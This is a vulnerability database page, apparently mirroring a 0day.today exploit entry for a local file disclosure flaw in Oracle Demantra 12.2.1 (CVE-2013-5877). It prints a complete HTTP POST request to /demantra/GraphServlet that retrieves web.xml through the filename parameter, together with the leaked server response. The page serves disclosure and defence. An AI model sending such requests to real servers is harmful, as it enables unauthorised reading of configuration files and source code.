Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtPortcullis1337DAY-ID-21964
HistoryMar 01, 2014 - 12:00 a.m.

Oracle Demantra 12.2.1 - Arbitrary File Disclosure

2014-03-0100:00:00
Portcullis
0day.today
22

0.884 High

EPSS

Percentile

98.7%

JSON

Exploit for windows platform in category web applications

Details:
 
The Team discovered a Local File Include (LFI) vulnerability. A file inclusion vulnerability occurs when a file from the target system is injected into a page on the attacked server page.
 
The vulnerable page is:
* /demantra/GraphServlet
Impact:
 
Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:
 
- Harvest useful information from the web.xml configuration file.
 
- Download the whole web application source code like the vulnerable page itself.
Exploit:
 
Request:
 
POST /demantra/GraphServlet HTTP/1.1
Host: 192.168.14.171:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
 
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
 
Response:
 
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/png
Content-Length: 44378
Date: Fri, 02 Aug 2013 20:20:58 GMT
 
<?xml version="1.0" encoding="UTF-8"?>
  
   <web-app
    id="WebApp_9" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
    http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">   
 
     
 
 
    <!-- Important Notice -->
    <!--
        The order of elements in the web.xml is significant for some
        Application Server parsers like WebSphere. The expected order is
        examplified in the comments of this file. Each element section has a
        Start comment(***) and an End comment. Please make sure to add new
        elements in the appropriate section of the file delimited by the
        relevant comment.
    -->
 
    <!-- ***Icons Start -->
    <!-- ***Icons End -->
-snip-‘

#  0day.today [2018-01-10]  #

Related

cvelist 1
prion 1
checkpoint_advisories 1
packetstorm 1
nvd 1
cve 1
metasploit 1
threatpost 1
securityvulns 1
oracle 1
cvelist
cvelist
CVE-2013-5877
2014-01-15 00:30:00
prion
prion
Buffer overflow
2014-01-15 16:11:00
checkpoint_advisories
checkpoint_advisories
Oracle Demantra 1221 Arbitrary File Disclosure - Ver2 (CVE-2013-5877)
2015-03-26 00:00:00
packetstorm
packetstorm
Oracle Demantra 12.2.1 Arbitrary File Retrieval
2014-03-01 00:00:00
nvd
nvd
CVE-2013-5877
2014-01-15 16:11:05
cve
cve
CVE-2013-5877
2014-01-15 16:11:05
metasploit
metasploit
Oracle Demantra Arbitrary File Retrieval with Authentication Bypass
2014-03-27 04:53:12
threatpost
threatpost
Four Oracle Demantra Security Vulnerabilities Found
2014-03-03 14:08:14
securityvulns
securityvulns
Oracle / Sun / MySQL / PeopleSoft / OpenJDK applications multiple security vulnerabilities
2014-05-05 00:00:00
oracle
oracle
Oracle Critical Patch Update - January 2014
2014-01-14 00:00:00

0.884 High

EPSS

Percentile

98.7%

JSON
Related for 1337DAY-ID-21964
cvelist1prion1checkpoint_advisories1packetstorm1nvd1cve1metasploit1threatpost1securityvulns1oracle1